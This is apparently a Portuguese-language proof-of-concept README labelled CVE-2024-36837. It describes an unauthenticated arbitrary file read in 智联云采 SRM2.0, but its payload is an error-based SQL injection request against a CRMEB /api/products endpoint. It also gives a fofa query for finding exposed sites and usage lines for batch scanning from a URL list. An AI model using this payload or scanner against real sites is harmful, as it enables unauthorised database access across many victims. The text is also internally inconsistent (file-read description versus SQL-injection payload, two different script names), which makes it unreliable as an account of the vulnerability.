
CVE-2024-36837 POC
#CVE-2024-36837
#A interface runtimeLog/download do SRM2.0 da 智联云采 apresenta uma vulnerabilidade de leitura arbitrária de arquivos, e um atacante não autenticado pode, por meio dessa vulnerabilidade, ler arquivos importantes do sistema (como arquivos de configuração de banco de dados, arquivos de configuração do sistema), arquivos de configuração de banco de dados, etc., deixando o site em um estado extremamente inseguro.
Sintaxe do fofa: body="/wap/first/zsff/iconfont/iconfont.css" || body="CRMEB"
#POC:
GET /api/products?limit=20&priceOrder&salesOrder&selectId=GTID_SUBSET(CONCAT(0x7e,(SELECT+(ELT(3550=3550,md5(9753165)))),0x7e),3550) HTTP/1.1 Host: x.x.x.x User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.1.2 Safari/605.1.15 Connection: close Accept: / Accept-Language: en Accept-Encoding: gzip #Adicione http:// ou https:// antes da url python 11.py
#Como usar python cve.py -h
#Detecção em lote Os endereços de URL no url.txt devem ter http:// ou https:// python cve.py -f url.txt
#Detecção individual O endereço de URL deve ter http:// ou https:// python cve.py -u url